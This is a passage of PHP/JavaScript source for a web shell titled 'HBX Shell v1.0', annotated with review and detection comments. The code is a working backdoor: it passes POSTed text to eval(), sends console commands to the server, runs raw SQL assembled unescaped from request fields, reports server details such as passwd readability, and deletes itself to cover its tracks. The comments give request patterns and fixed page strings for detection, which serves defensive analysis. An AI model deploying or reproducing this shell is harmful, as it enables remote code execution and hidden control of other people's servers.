for($j=0;$j<count($vals);$j++) {
if($j==count($vals)-1) {$update.=" SET `$keys[$j]`='$vals[$j]' WHERE $_POST[row]='$_POST[v]'"; break;}
$update.=" SET `$keys[$j]`='$vals[$j]',";
}
echo $update."<br />";
mysql_query($update) or die(mysql_error());
echo "Updated row successfully!<br />";
}
} else {echo "<font color='red'>Warning: Failed to connect to SQL server</font>";}
echo"</center>";
mysql_view_dbs();
}
// `logout` action: wipes and destroys the PHP session (which held the DB
// credentials) and shows the login form again.
function sql_end_session() {
$_SESSION=array();
session_destroy();
echo "<center><font color='#00FF00'>Logged out from SQL</font></center><br />";
sql_login();
}
  649.  
// `query` action: executes $query (raw text from POST `q`) with the session
// credentials and reports mysql_affected_rows(); result sets are not shown.
function execute_query($query) {
extract($_SESSION);
if(@$conn=mysql_connect($host,$user,$pass)) {
mysql_query($query) or die(mysql_error());
$affected=mysql_affected_rows();
echo "Query executed. Affected rows: $affected";
}
}
  658. //End SQL functions
  659.  
// Unused stub: defines a regex for include/require of request variables but
// never applies it, and nothing in the dispatcher calls this function.
function find_exploits() {
$exploits=array("File inclusion"=>"/(include|include_once|require|require_once)\(\\$_[GP].*{2,3}\[/");
}
// `eval` action: with POST `e` present, the submitted text is passed straight
// to eval() (after stripslashes) and whatever it returns is echoed; otherwise
// the two-textarea editor UI is rendered. Detection hint: POST bodies carrying
// `s=eval` together with `e=` are this code path.
function post_eval() {
if(isset($_POST['e'])) {
echo eval(stripslashes($_POST['e']));
} else {
echo "<textarea id='eval_out' style='width: 100%; display: none;' rows='10'>//Don't include PHP tags</textarea><br /><textarea id='eval' style='width: 100%' rows='10'>//Don't include PHP tags</textarea><br /><center><a href='#' onClick=\"sendRequest('eval','eval')\">[ Eval ]</a>";
}
}
// `cmd` action: renders the command prompt UI only. Pressing Enter in
// `cmd_in` is handled by the page's checkKey() JavaScript, which posts the
// text as `s=exec&cmd=...` (see the <script> block at the end of the file).
function console() {
echo "<div id='cmd'><input type='text' style='width: 100%' onKeyDown=\"checkKey(event,'exec')\"id='cmd_in'><br /><textarea id='cmd_out' style='width: 100%;' rows='20'></textarea></div>";
}
// `kill` action: first call shows a confirmation link; with POST `dokill`
// the script unlink()s its own basename relative to the current directory.
// Forensics: after this runs the file itself is gone, so the web-server access
// log (POST with `s=kill`) is what remains of the activity on the host.
function kill_shell() {
if(!isset($_POST['dokill'])) {
echo "<center><h1><a href='#' onClick=\"sendRequest('kill&dokill=1')\">[ Confirm kill ]</a></h1></center>";
} else {
if(unlink(basename($_SERVER['PHP_SELF']))) echo "<center>Thanks for using HBX shell! - HomicidalMortician</center>";
else echo "<center><font color='red'>Warning: Failed to delete shell</font></center>";
}
}
  681. ?>
  682.  
  683. <html>
  684. <head>
  685. <title>HBX Shell v1.0 | BETA</title>
<?php
// Writes the page stylesheet inline. Each $shell[...] token is PHP
// double-quoted-string interpolation of the $shell configuration array
// declared at the top of the file (the unquoted-key form is valid inside
// double quotes).
// NOTE(review): $shell[Textarea_Font] below has no matching key in that array
// (it defines Textarea_BG, Textarea_Color and Textarea_Border), so the
// textarea font-family rule interpolates empty and raises an undefined-index
// notice -- confirm against the array definition.
echo "
<style>
body {
background-color: $shell[Background];
font-size: 12px;
color: $shell[Primary_Color];
}

a {
text-decoration: none;
color: $shell[Link_Color];
}

td {
border-color: $shell[Border];
}

a:hover {
color: $shell[Hover];
}

input {
background-color: $shell[Input_BG];
color: $shell[Input_Color];
border: 1px solid $shell[Input_Border];
}

textarea {
background-color: $shell[Textarea_BG];
color: $shell[Textarea_Color];
font-family: $shell[Textarea_Font];
border: 1px solid $shell[Textarea_Border];
}

select {
background-color: #222222;
color: #3388ff;
}

#header {
font-size: 12px;
background-color: #000000;
padding-left: 2px;
color: $shell[Header_Color];
font-family: $shell[Header_Font]
}

#browse {
background-color: #000000;
color: #FFFFFF;
border-bottom: 1px solid $shell[Border];
text-align: center;
padding-bottom: 5px;
}

#browse a {
color: #3388ff;
text-decoration: none;
padding-left: 30px;
font-size: 12px;
font-family: Arial, Helvetica, sans-serif;
}

#browse a:hover {
color: #00FF00;
text-decoration: underline;
}

#shell {
font-family: $shell[Font];
border-bottom: 1px solid $shell[Border];
font-size: 12px;
padding-bottom: 20px;
background-color: #000000;
}

#shell td {
padding-right: 10px;
font-size: 14px;
}

#shell tr:hover {
background-color: #333333;
}

#back {
float: right;
}

#back a{
font-size: 10px;
}

.info td {
padding-right: 5px;
}

#cmd textarea {
background-color: $shell[CMD_BG];
color: $shell[CMD_COLOR];
font-family: $shell[CMD_FONT];
border: 1px solid $shell[CMD_BORDER];
}

#cmd input {
background-color: $shell[CMD_BG];
color: $shell[CMD_COLOR];
border: 1px solid $shell[CMD_BORDER];
}
</style>"; ?>
  797.  
  798. <script>
// Single-slot request history backing the "[ Back ]" link; history_back()
// overwrites it with one entry after every completed request.
var m_history=[];
// NOTE(review): current and sz are declared but never referenced anywhere in
// the visible script -- presumably leftovers.
var current=0;
var sz=0;
  802.  
// Records the most recent request string and rewrites the #back element with
// a "[ Back ]" link that re-issues that request through sendRequest().
// The history holds exactly one entry: each call replaces the whole array.
// `last` is interpolated unescaped into the onClick attribute, so a request
// string containing a quote character breaks the generated markup.
function history_back(last) {
m_history=[last];
document.getElementById("back").innerHTML="<a href='#' onClick=\"sendRequest('"+m_history[0]+"')\">[ Back ]</a>";
}
  807.  
// Toggles the element with the given id between display:none and
// display:block (used by the "[ Show/Hide More Information ]" link).
function show(id) {
var opt=document.getElementById(id).style.display;
if(opt=='none') document.getElementById(id).style.display='block';
else document.getElementById(id).style.display='none';
}
  813.  
// Key handler for the page's text inputs: on Enter (key code 13) it assembles
// the request string for the given action and passes it to sendRequest();
// every other key is ignored.
//   exec      -> "exec&cmd=<#cmd_in>", response routed to #cmd_out
//   create    -> "create&db=<#new_database>"
//   createtbl -> "create&db=<#sql_db>&tbl=<#new_database>"
//   sql_query -> "query&q=<#sql_in, URL-encoded>", response routed to #sql_out
//   anything else is forwarded unchanged.
// The server-side handlers for these action names are outside this part of
// the file.
// NOTE(review): `key` is assigned without var and becomes an implicit global;
// `request` is declared but unused.
function checkKey(e,req) {
var request='';
if(window.event) key=e.keyCode;
else if(e.which) key=e.which;
if(key==13) {
if(req=='exec') {
req+='&cmd='+document.getElementById('cmd_in').value;
sendRequest(req,'cmd');
}
else if(req=='create') {
req+="&db="+document.getElementById('new_database').value;
sendRequest(req);
}
else if(req=='createtbl') {
req="create";
req+="&db="+document.getElementById('sql_db').value+"&tbl="+document.getElementById('new_database').value;
sendRequest(req);
} else if(req=='sql_query') {
req="query&q="+encodeURIComponent(document.getElementById('sql_in').value);
sendRequest(req,'sqlQuery');
} else {
sendRequest(req);
}
}
}
  839.  
// Replaces the #shell panel with an inline prompt for one file action
// (rename / chmod / move) on the path given in `params`; the prompt's link
// sends the matching request together with the typed value.
// `params` is interpolated unescaped into both the HTML and the onClick
// attribute, so a path containing quote characters breaks the markup.
// An unrecognised `input` value leaves the panel untouched.
function loadInput(input,params) {
if(input=='rename') {
document.getElementById('shell').innerHTML="Renaming file "+params+"<br /><input type='text' value='' id='rnfile'> <a href='#' onClick=\"sendRequest('rename&file="+params+"','rename')\">[ Rename ]</a>";
}
if(input=='chmod') {
document.getElementById('shell').innerHTML="Changing perms for "+params+"<br /><input type='text' value='666' id='chfile'> <a href='#' onClick=\"sendRequest('chmod&file="+params+"','chmod')\">[ Chmod ]</a>";
}
if(input=='move') {
document.getElementById('shell').innerHTML="Move file "+params+"<br /> to location: <input style='width: 500px' type='text' value='"+params+"' id='mvfile'> <a href='#' onClick=\"sendRequest('mv&file="+params+"','mvfile')\">[ Move ]</a>";
}
}
  851.  
// Submits one action to the server and routes the reply into the page.
// The body is form-encoded as "s=<request>" (the `s` parameter selects the
// server-side action; that dispatcher is outside this part of the file) with
// extra fields appended according to `option`, POSTed to '?' -- i.e. the
// script's own URL.
// On completion (readyState 4) it records the request for the Back link and
// writes responseText into #cmd_out (cmd), #eval_out (eval), #sql_out
// (sqlQuery) or #shell (any other option).
// Detection note: every operation of this page is a POST to the hosting
// script whose body begins with "s=" followed by one of the action names used
// here (view, cmd, eval, sql, kill, rename, chmod, mv, query, ...) -- a
// stable pattern for request logging and web-application-firewall rules.
// NOTE(review): url_req and data are assigned without var (implicit globals);
// the 'insert' branch encodes with escape() while 'sqlsave' uses
// encodeURIComponent(), so the two treat non-ASCII and some symbols
// differently; onreadystatechange is attached after send(), which works for
// asynchronous requests in practice but is fragile ordering.
function sendRequest(request,option) {
url_req='';
var xmlHTTP=1;
if(window.XMLHttpRequest) xmlHTTP=new XMLHttpRequest();
else if(window.ActiveXObject) xmlHTTP=new ActiveXObject('Microsoft.XMLHTTP');
else alert('Get a new browser.');
url_req='s='+request;
if(option=='sqlsave') {
var str='';
var elem=document.getElementById('sqlvals').elements;
for(var i=0;i<elem.length;i++) {
if(i%2==0)
str+="&"+encodeURIComponent(elem[i].value)+"=";
else
str+=encodeURIComponent(elem[i].value);
}
str+="&update=1";
url_req+=str;
}
if(option=='save') {
data=encodeURIComponent(document.getElementById('file').value)
url_req+="&data="+data;
}
if(option=='rename') {
url_req+="&rname="+document.getElementById('rnfile').value;
}
if(option=='chmod') {
url_req+="&mod="+document.getElementById('chfile').value;
}
if(option=='mvfile') {
url_req+="&location="+document.getElementById('mvfile').value;
}
if(option=='eval') {
url_req+="&e="+encodeURIComponent(document.getElementById('eval').value);
}
if(option=='sqllogin') {
url_req+="&host="+document.getElementById('sql_host').value+"&user="+document.getElementById('sql_user').value+"&pass="+encodeURIComponent(document.getElementById('sql_pass').value); //For passwords with pesky post characters.
}
if(option=='insert') {
var str='';
var elem=document.getElementById('vals').elements;
for(var i=0;i<elem.length;i++) {
if(i%2==0)
str+="&"+escape(elem[i].value)+"=";
else
str+=escape(elem[i].value);
}
str+="&update=1";
url_req+=str;
}
xmlHTTP.open('POST','?');
xmlHTTP.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xmlHTTP.send(url_req);
// Response routing; the target element depends only on `option`.
xmlHTTP.onreadystatechange=function() {
if(xmlHTTP.readyState==4) {
history_back(request);
if(option=='cmd') {
document.getElementById('cmd_in').value='Executing...';
document.getElementById('cmd_out').innerHTML=xmlHTTP.responseText;
document.getElementById('cmd_in').value='';
}
else if(option=='eval') {
document.getElementById('eval_out').style.display='block';
document.getElementById('eval_out').value=xmlHTTP.responseText;
}
else if(option=='sqlQuery') {
document.getElementById('sql_out').style.display='block';
document.getElementById('sql_in').value='Executing query...';
document.getElementById('sql_out').value=xmlHTTP.responseText;
document.getElementById('sql_in').value='';
}
else {
document.getElementById('shell').innerHTML=xmlHTTP.responseText;
}
}
}
}
  929.  
  930. </script>
  931.  
  932. </head>
  933.  
  934. <body>
<?php
// Emits the page body. The header interpolates server facts ($location,
// $remote_addr, $open_basedir, $safe_mode, $disabled_functions, $uname, ...)
// that are assigned earlier in the file, outside this part of it.
// Each navigation link calls sendRequest() with an action name (view, cmd,
// eval, sql, kill), and the inline <script> inside #shell requests the file
// listing as soon as the page loads.
// The trailing "[ Execute CMD ]" / "[ Quick Commands ]" / "[ Tools ]" table
// carries no event handlers and its <option> elements use name= rather than
// value=, so in this version it is static placeholder markup.
// Detection note: the fixed labels rendered here ("Shell status",
// "Open_BaseDir", "Read passwd", "Remote includes") and the page <title>
// above are stable strings for content-based signatures on served pages.
echo "
<div id='header'>
Shell: <font color='#737a85'><b>$location</b></font><br />
Server: <font color='#ff4422'>$remote_addr ($remote_host)</font><br />
Local: <font color='#737a85'><b>$local_addr ($local_host)</b></font><br />
Open_BaseDir: $open_basedir<br />
Safe Mode: $safe_mode<br />
MySQL: $mysql_on<br />
Disabled functions: $disabled_functions<br />
Shell status: <u><font color='#ff4422'>Viewing files</font></u><br />
<div id='info' style='display: none;'>
Disk: $disk_free of $disk_space<br />
Software: $software<br />
PHP Version: $php_ver<br />
Uname: $uname<br />
Read passwd: $read_passwd<br />
cURL: $curl_on<br />
Remote includes: $includes<br />
</div>
<a href='#' onClick=\"show('info')\">[ Show/Hide More Information ]</a>
<br /><br />
</div>
<div id='browse'>
<a href='#' onClick=\"sendRequest('view')\">[ Files ]</a>
<a href='#' onClick=\"sendRequest('cmd')\">[ Console ]</a>
<a href='#' onClick=\"sendRequest('eval')\">[ Eval ]</a>
<a href='#' onClick=\"sendRequest('sql')\">[ MySQL ]</a>
<a href='#' onClick=\"sendRequest('kill')\">[ Kill Shell ]</a>
</div>
<div id='back'></div>
<br />
<br />
<div id='shell'>
<script>sendRequest('view')</script>
</div><br /><br />

<table width='100%' style='font-size: 12px; text-align: center; margin: auto;' cols='2' cellpadding='5'>
<tr><td colspan='2'>[ Execute CMD ]</td></tr>
<tr><td colspan='2'><input type='text' value='whoami' style='width: 75%'></td></tr>
<tr><td>[ Quick Commands ]</td><td>[ Tools ]</td></tr>
<tr><td><select>
<option name=''>Select a command</option>
<option name='configs'>Current directory</option>
<option name='sql'>Open ports</option>
</select>
</td>
<td><select>
<option name=''>Select a tool</option>
<option name=''>---------------------------------------------------------------------</option>
<option name='configs'>Find configs</option>
<option name='sql'>Find SQL files</option>
<option name='sql'>Find writable files</option>
<option name='sql'>Find writable dirs</option>
<option name='sql'>---------------------------------------------------------------------</option>
<option name='sql'>Retrieve list of enumerated users</option>
<option name='sql'>Dump tables and columns (schema)</option>
</select>
</td></tr>
<tr><td>[ Upload file ]</td><td>[ Download file ]</td></tr>
<tr><td>[ Enter directory ]</td><td>[ Edit file ]</td></tr>
</table>
</body>
</html>";
// Flushes the output buffer opened with ob_start() when the script began.
ob_end_flush();
?>